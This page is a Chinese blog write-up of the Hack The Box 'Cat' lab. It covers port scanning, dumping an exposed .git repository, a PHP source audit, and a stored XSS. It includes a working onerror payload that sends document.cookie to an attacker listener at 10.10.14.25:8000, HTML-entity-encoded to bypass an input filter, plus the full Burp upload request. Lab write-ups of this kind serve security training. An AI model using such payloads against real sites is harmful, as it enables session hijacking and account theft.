<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"lingx5.github.io","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="HTB-cat 靶机靶机地址: https:&#x2F;&#x2F;app.hackthebox.com&#x2F;machines&#x2F;Cat 一台中等难度的靶机，主要是练习利用来 xss 钓鱼，进行攻克的靶机。 nmap 扫描1sudo nmap -sT --min-rate 10000 -p- 10.10.11.53 -o ports  1234567891011[sudo] password for kali: Sta">
<meta property="og:type" content="article">
<meta property="og:title" content="HTB-cat 靶机">
<meta property="og:url" content="http://lingx5.github.io/2025/07/19/HTB-cat-%E9%9D%B6%E6%9C%BA/index.html">
<meta property="og:site_name" content="lingx5的博客">
<meta property="og:description" content="HTB-cat 靶机靶机地址: https:&#x2F;&#x2F;app.hackthebox.com&#x2F;machines&#x2F;Cat 一台中等难度的靶机，主要是练习利用来 xss 钓鱼，进行攻克的靶机。 nmap 扫描1sudo nmap -sT --min-rate 10000 -p- 10.10.11.53 -o ports  1234567891011[sudo] password for kali: Sta">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719112919481.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719121133539.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719123323436.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719123437967.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719123715495.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719123911915.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719125340109.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719125940430.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719132110494.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719134032229.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719134247568.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719134441117.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719145621732.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719145824393.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719153748349.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719154238622.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719154422649.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719161243864.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719161420168.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719163946141.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719164056131.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719165120686.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719165219211.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719170038100.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719195524391.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719202547271.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719203425682.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719205112226.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719205235659.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719210423054.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719210516961.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719211632410.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719211922034.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719212010887.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719212147375.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719212744076.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719214437092.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719215028391.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719220343898.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719220734916.png">
<meta property="og:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719220831149.png">
<meta property="article:published_time" content="2025-07-19T14:13:02.000Z">
<meta property="article:modified_time" content="2025-07-19T14:18:21.801Z">
<meta property="article:author" content="lingx5">
<meta property="article:tag" content="HTB靶机">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://gitee.com/ling-x5/img/raw/master/image-20250719112919481.png">

<link rel="canonical" href="http://lingx5.github.io/2025/07/19/HTB-cat-%E9%9D%B6%E6%9C%BA/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>HTB-cat 靶机 | lingx5的博客</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">lingx5的博客</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://lingx5.github.io/2025/07/19/HTB-cat-%E9%9D%B6%E6%9C%BA/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="lingx5">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="lingx5的博客">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          HTB-cat 靶机
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2025-07-19 22:13:02 / 修改时间：22:18:21" itemprop="dateCreated datePublished" datetime="2025-07-19T22:13:02+08:00">2025-07-19</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/HTB%E9%9D%B6%E6%9C%BA/" itemprop="url" rel="index"><span itemprop="name">HTB靶机</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <meta name="referrer" content="no-referrer" />

<h1 id="HTB-cat-靶机"><a href="#HTB-cat-靶机" class="headerlink" title="HTB-cat 靶机"></a>HTB-cat 靶机</h1><p>靶机地址: <a target="_blank" rel="noopener" href="https://app.hackthebox.com/machines/Cat">https://app.hackthebox.com/machines/Cat</a></p>
<p>一台中等难度的靶机，主要是练习利用来 xss 钓鱼，进行攻克的靶机。</p>
<h2 id="nmap-扫描"><a href="#nmap-扫描" class="headerlink" title="nmap 扫描"></a>nmap 扫描</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> nmap -sT --min-rate 10000 -p- 10.10.11.53 -o ports</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">[sudo] password for kali: </span><br><span class="line">Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-18 23:19 EDT</span><br><span class="line">Warning: 10.10.11.53 giving up on port because retransmission cap hit (10).</span><br><span class="line">Nmap scan report for cat.htb (10.10.11.53)</span><br><span class="line">Host is up (0.23s latency).</span><br><span class="line">Not shown: 62804 closed tcp ports (conn-refused), 2729 filtered tcp ports (no-response)</span><br><span class="line">PORT   STATE SERVICE</span><br><span class="line">22/tcp open  ssh</span><br><span class="line">80/tcp open  http</span><br><span class="line"></span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 41.18 seconds</span><br></pre></td></tr></table></figure>

<p>看到只开放了 22，80 两个端口</p>
<p>继续进行详细信息扫描</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> nmap -sT -A -p22,80 10.10.11.53 -o details</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/ling-x5/img/raw/master/image-20250719112919481.png" alt="image-20250719112919481"></p>
<p>看到有 redirect ，我们需要把这个域名与 ip 绑定才能保证详细信息的准确性。在 hosts 文件中绑定看一下</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> <span class="built_in">echo</span> <span class="string">&#x27;10.10.11.53  cat.htb&#x27;</span> | <span class="built_in">sudo</span> <span class="built_in">tee</span> -a /etc/hosts</span><br></pre></td></tr></table></figure>

<p>配置好重新进行扫描</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-18 23:43 EDT</span><br><span class="line">Nmap scan report for cat.htb (10.10.11.53)</span><br><span class="line">Host is up (0.23s latency).</span><br><span class="line"></span><br><span class="line">PORT   STATE SERVICE VERSION</span><br><span class="line">22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)</span><br><span class="line">| ssh-hostkey: </span><br><span class="line">|   3072 96:2d:f5:c6:f6:9f:59:60:e5:65:85:ab:49:e4:76:14 (RSA)</span><br><span class="line">|   256 9e:c4:a4:40:e9:da:cc:62:d1:d6:5a:2f:9e:7b:d4:aa (ECDSA)</span><br><span class="line">|_  256 6e:22:2a:6a:6d:eb:de:19:b7:16:97:c2:7e:89:29:d5 (ED25519)</span><br><span class="line">80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))</span><br><span class="line">| http-git: </span><br><span class="line">|   10.10.11.53:80/.git/</span><br><span class="line">|     Git repository found!</span><br><span class="line">|     Repository description: Unnamed repository; edit this file &#x27;description&#x27; to name the...</span><br><span class="line">|_    Last commit message: Cat v1 </span><br><span class="line">|_http-title: Best Cat Competition</span><br><span class="line">| http-cookie-flags: </span><br><span class="line">|   /: </span><br><span class="line">|     PHPSESSID: </span><br><span class="line">|_      httponly flag not set</span><br><span class="line">|_http-server-header: Apache/2.4.41 (Ubuntu)</span><br><span class="line">Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port</span><br><span class="line">Device type: general purpose|router</span><br><span class="line">Running: Linux 4.X|5.X, MikroTik RouterOS 7.X</span><br><span class="line">OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3</span><br><span class="line">OS details: Linux 4.15 - 5.19, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)</span><br><span class="line">Network Distance: 2 hops</span><br><span class="line">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br><span class="line"></span><br><span class="line">TRACEROUTE (using proto 1/icmp)</span><br><span class="line">HOP RTT       ADDRESS</span><br><span class="line">1   235.06 ms 10.10.14.1</span><br><span class="line">2   239.15 ms cat.htb (10.10.11.53)</span><br><span class="line"></span><br><span class="line">OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 23.33 seconds</span><br></pre></td></tr></table></figure>

<p>我们通过这次看到了关键信息 <code>10.10.11.53:80/.git/</code> 与 <code>httponly flag not set</code> </p>
<p>我们可以利用 <code>git-dumper</code> 工具把目标的源码给拉下来。同时 httponly 没有设置，这就让我们利用 xss 偷到目标 cookie 会比较简单</p>
<h2 id="源码审计"><a href="#源码审计" class="headerlink" title="源码审计"></a>源码审计</h2><p>先拉源码</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git-dumper http://cat.htb/.git/ dump</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/ling-x5/img/raw/master/image-20250719121133539.png" alt="image-20250719121133539"></p>
<p>我们打开 80 端口，熟悉一下网站的功能</p>
<img src="https://gitee.com/ling-x5/img/raw/master/image-20250719123323436.png" alt="image-20250719123323436" style="zoom:67%;" />

<p>看到 home vote contest winners join 页面</p>
<p>我们都点一下，发现 join 页面可以注册</p>
<img src="https://gitee.com/ling-x5/img/raw/master/image-20250719123437967.png" alt="image-20250719123437967" style="zoom: 50%;" />

<p>注册一个账户，登录。我们发现 contest 可以访问了，功能是添加一个猫咪去竞赛</p>
<img src="https://gitee.com/ling-x5/img/raw/master/image-20250719123715495.png" alt="image-20250719123715495" style="zoom:50%;" />

<p>我们正常添加一个，成功添加，提示信息表示：<code>这个小猫会被发送去检测</code> 那应该就是管理员要检测我们上传的猫咪</p>
<img src="https://gitee.com/ling-x5/img/raw/master/image-20250719123911915.png" alt="image-20250719123911915" style="zoom:50%;" />

<p>看一下源码，用 vscode 打开，看到给参数屏蔽了一些特殊字符</p>
<p><img src="https://gitee.com/ling-x5/img/raw/master/image-20250719125340109.png" alt="image-20250719125340109"></p>
<p>顺便看一下管理员查看审核猫咪的页面 <code>view_cat.php</code></p>
<p>在 title 处使用了 <code>htmlspecialchars()</code> 函数，就不存在 xss，我们继续往下看</p>
<p><img src="https://gitee.com/ling-x5/img/raw/master/image-20250719125940430.png" alt="image-20250719125940430"></p>
<p>来到猫咪显示的 <code>container</code> , 看到 <code>&lt;img&gt;</code> 标签的 src 属性直接就接上了 php 的 echo 函数，没做任何的过滤</p>
<p><img src="https://gitee.com/ling-x5/img/raw/master/image-20250719132110494.png" alt="image-20250719132110494"></p>
<p>这里就可以利用 onerror 函数来进行 xss</p>
<blockquote>
<p>为什么不是任何的 echo 都可以 xss ？</p>
<p>因为前面 content.php 中，在上传是对参数做了 <code>forbidden_patterns</code> ，过滤了特殊字符 <code>/[+*&#123;&#125;&#39;,;&lt;&gt;()\\[\\]\\/\\:]/</code> </p>
<p>也就是这些字符</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">+  *  &#123;  &#125;  &#x27;  ,  ;  &lt;  &gt;  (  )  [  ]  \  /  :</span><br></pre></td></tr></table></figure>

<p>所以我们要通过 html 实体编码来进行绕过，而实体编码在浏览器是原因输出 <strong>(包括 <code>&quot;&quot;</code> 实体编码后也就相当于加了注释符，会被当作普通字符串处理)</strong> 不会被浏览器解析为标签，这就是我们我们只能利用 <code>&lt;img src=.....&gt;</code> 这样标签的原因</p>
</blockquote>
<p>嵌入的字符串为 <code>$cat[&#39;photo_path&#39;]</code> 我们来跟一下 <code>$cat[&#39;photo_path&#39;]</code> 是怎么生成的，因为在 POST 传参时，并没有这个变量</p>
<p>在 <code>view_cat.php</code> 中 <code>$cat</code> 是通过数据库查到的</p>
<p><img src="https://gitee.com/ling-x5/img/raw/master/image-20250719134032229.png" alt="image-20250719134032229"></p>
<p>来到 <code>contest.php</code> 看到数据库插入中的 <code>photo_path</code> 参数的生成</p>
<img src="https://gitee.com/ling-x5/img/raw/master/image-20250719134247568.png" alt="image-20250719134247568" style="zoom: 50%;" />

<p>绑定的是 <code>$rget_file</code> 变量，继续跟</p>
<p><img src="https://gitee.com/ling-x5/img/raw/master/image-20250719134441117.png" alt="image-20250719134441117"></p>
<blockquote>
<p><code>basename</code> 就是安全提取文件明的，是为了防止目录穿越的攻击</p>
</blockquote>
<p>由此我们可以推测 <code>$cat[&#39;photo_path&#39;]</code> 实行如 <code>uploads/随机值_ + name参数</code> </p>
<p>举个例子：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uploads/dsagdfsng4wegf_小猫.jpg</span><br></pre></td></tr></table></figure>

<p>xss 注入的结果，把 name 换为 <code>x &quot; onerror=&quot;fetch(&#39;http://10.10.14.25:8000?cookie=&#39;+document.cookie); </code></p>
<p>这样 <code>$cat[&#39;photo_path&#39;]</code> 就是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uploads/dsagdfsng4wegf_x &quot; onerror=&quot;fetch(&#x27;http://10.10.14.25:8000?cookie=&#x27;+document.cookie);</span><br></pre></td></tr></table></figure>

<p>拼接到管理员查看猫咪的 <code>view_cat.php</code> 就是</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">&quot;uploads/dsagdfsng4wegf_x &quot;</span> <span class="attr">onerror</span>=<span class="string">&quot;fetch(&#x27;http://10.10.14.25:8000?cookie=&#x27;+document.cookie);&quot;</span> <span class="attr">alt</span>=<span class="string">&quot;x &quot;</span> <span class="attr">onerror</span>=<span class="string">&quot;fetch(&#x27;http://10.10.14.25:8000?cookie=&#x27;+document.cookie);&quot;</span> <span class="attr">class</span>=<span class="string">&quot;cat-photo&quot;</span> &gt;</span></span><br></pre></td></tr></table></figure>

<p>在 <a target="_blank" rel="noopener" href="https://gchq.github.io/CyberChef/">cyberchef</a> 中 进行 html 实体编码，把 <code>;</code> 要置换为空，因为 <code>;</code> 也在 forbidden 中</p>
<p><img src="https://gitee.com/ling-x5/img/raw/master/image-20250719145621732.png" alt="image-20250719145621732"></p>
<p>拿到 payload</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;x onerror=&quot;&amp;#x66&amp;#x65&amp;#x74&amp;#x63&amp;#x68&amp;#x28&amp;#x27&amp;#x68&amp;#x74&amp;#x74&amp;#x70&amp;#x3a&amp;#x2f&amp;#x2f&amp;#x31&amp;#x30&amp;#x2e&amp;#x31&amp;#x30&amp;#x2e&amp;#x31&amp;#x34&amp;#x2e&amp;#x32&amp;#x35&amp;#x3a&amp;#x38&amp;#x30&amp;#x30&amp;#x30&amp;#x3f&amp;#x63&amp;#x6f&amp;#x6f&amp;#x6b&amp;#x69&amp;#x65&amp;#x3d&amp;#x27&amp;#x2b&amp;#x64&amp;#x6f&amp;#x63&amp;#x75&amp;#x6d&amp;#x65&amp;#x6e&amp;#x74&amp;#x2e&amp;#x63&amp;#x6f&amp;#x6f&amp;#x6b&amp;#x69&amp;#x65&amp;#x29&amp;#x3b</span><br></pre></td></tr></table></figure>

<p>上传，用 burp 抓包, 构造 payload，并开启监听</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/contest.php</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>cat.htb</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>en-US,en;q=0.5</span><br><span class="line"><span class="attribute">Accept-Encoding</span><span class="punctuation">: </span>gzip, deflate, br</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>multipart/form-data; boundary=---------------------------277959241037631938451543716937</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>23170</span><br><span class="line"><span class="attribute">Origin</span><span class="punctuation">: </span>http://cat.htb</span><br><span class="line"><span class="attribute">Connection</span><span class="punctuation">: </span>keep-alive</span><br><span class="line"><span class="attribute">Referer</span><span class="punctuation">: </span>http://cat.htb/contest.php</span><br><span class="line"><span class="attribute">Cookie</span><span class="punctuation">: </span>PHPSESSID=dme3vsvslluef4d28sgsevpgdh</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span><span class="punctuation">: </span>1</span><br><span class="line"><span class="attribute">Priority</span><span class="punctuation">: </span>u=0, i</span><br><span class="line"></span><br><span class="line"><span class="language-step21">----------------------------<span class="number">-277959241037631938451543716937</span></span></span><br><span class="line"><span class="language-step21">Content-Disposition: form-<span class="keyword">data</span>; name=<span class="string">&quot;cat_name&quot;</span></span></span><br><span class="line"><span class="language-step21"></span></span><br><span class="line"><span class="language-step21"><span class="string">&quot;x onerror=&quot;</span>&amp;<span class="symbol">#x66</span>&amp;<span class="symbol">#x65</span>&amp;<span class="symbol">#x74</span>&amp;<span class="symbol">#x63</span>&amp;<span class="symbol">#x68</span>&amp;<span class="symbol">#x28</span>&amp;<span class="symbol">#x27</span>&amp;<span class="symbol">#x68</span>&amp;<span class="symbol">#x74</span>&amp;<span class="symbol">#x74</span>&amp;<span class="symbol">#x70</span>&amp;<span class="symbol">#x3</span>a&amp;<span class="symbol">#x2</span>f&amp;<span class="symbol">#x2</span>f&amp;<span class="symbol">#x31</span>&amp;<span class="symbol">#x30</span>&amp;<span class="symbol">#x2</span>e&amp;<span class="symbol">#x31</span>&amp;<span class="symbol">#x30</span>&amp;<span class="symbol">#x2</span>e&amp;<span class="symbol">#x31</span>&amp;<span class="symbol">#x34</span>&amp;<span class="symbol">#x2</span>e&amp;<span class="symbol">#x32</span>&amp;<span class="symbol">#x35</span>&amp;<span class="symbol">#x3</span>a&amp;<span class="symbol">#x38</span>&amp;<span class="symbol">#x30</span>&amp;<span class="symbol">#x30</span>&amp;<span class="symbol">#x30</span>&amp;<span class="symbol">#x3</span>f&amp;<span class="symbol">#x63</span>&amp;<span class="symbol">#x6</span>f&amp;<span class="symbol">#x6</span>f&amp;<span class="symbol">#x6</span>b&amp;<span class="symbol">#x69</span>&amp;<span class="symbol">#x65</span>&amp;<span class="symbol">#x3</span>d&amp;<span class="symbol">#x27</span>&amp;<span class="symbol">#x2</span>b&amp;<span class="symbol">#x64</span>&amp;<span class="symbol">#x6</span>f&amp;<span class="symbol">#x63</span>&amp;<span class="symbol">#x75</span>&amp;<span class="symbol">#x6</span>d&amp;<span class="symbol">#x65</span>&amp;<span class="symbol">#x6</span>e&amp;<span class="symbol">#x74</span>&amp;<span class="symbol">#x2</span>e&amp;<span class="symbol">#x63</span>&amp;<span class="symbol">#x6</span>f&amp;<span class="symbol">#x6</span>f&amp;<span class="symbol">#x6</span>b&amp;<span class="symbol">#x69</span>&amp;<span class="symbol">#x65</span>&amp;<span class="symbol">#x29</span>&amp;<span class="symbol">#x3</span>b</span></span><br><span class="line"><span class="language-step21">----------------------------<span class="number">-277959241037631938451543716937</span></span></span><br><span class="line"><span class="language-step21">Content-Disposition: form-<span class="keyword">data</span>; name=<span class="string">&quot;age&quot;</span></span></span><br><span class="line"><span class="language-step21"></span></span><br><span class="line"><span class="language-step21"><span class="number">11</span></span></span><br><span class="line"><span class="language-step21">----------------------------<span class="number">-277959241037631938451543716937</span></span></span><br><span class="line"><span class="language-step21">Content-Disposition: form-<span class="keyword">data</span>; name=<span class="string">&quot;birthdate&quot;</span></span></span><br><span class="line"><span class="language-step21"></span></span><br><span class="line"><span class="language-step21"><span class="number">0011</span><span class="number">-01</span><span class="number">-01</span></span></span><br><span class="line"><span class="language-step21">----------------------------<span class="number">-277959241037631938451543716937</span></span></span><br><span class="line"><span class="language-step21">Content-Disposition: form-<span class="keyword">data</span>; name=<span class="string">&quot;weight&quot;</span></span></span><br><span class="line"><span class="language-step21"></span></span><br><span class="line"><span class="language-step21"><span class="number">11</span></span></span><br><span class="line"><span class="language-step21">----------------------------<span class="number">-277959241037631938451543716937</span></span></span><br><span class="line"><span class="language-step21">Content-Disposition: form-<span class="keyword">data</span>; name=<span class="string">&quot;cat_photo&quot;</span>; filename=<span class="string">&quot;cat.jpeg&quot;</span></span></span><br><span class="line"><span class="language-step21">Content-Type: image/jpeg</span></span><br><span class="line"><span class="language-step21"></span></span><br><span class="line"><span class="language-step21">GIF89a;</span></span><br><span class="line"><span class="language-step21">aaaaaaa</span></span><br><span class="line"><span class="language-step21">----------------------------<span class="number">-277959241037631938451543716937</span>--</span></span><br></pre></td></tr></table></figure>

<p>发包, 成功拿到管理员的 cookie</p>
<p><img src="https://gitee.com/ling-x5/img/raw/master/image-20250719145824393.png" alt="image-20250719145824393"></p>
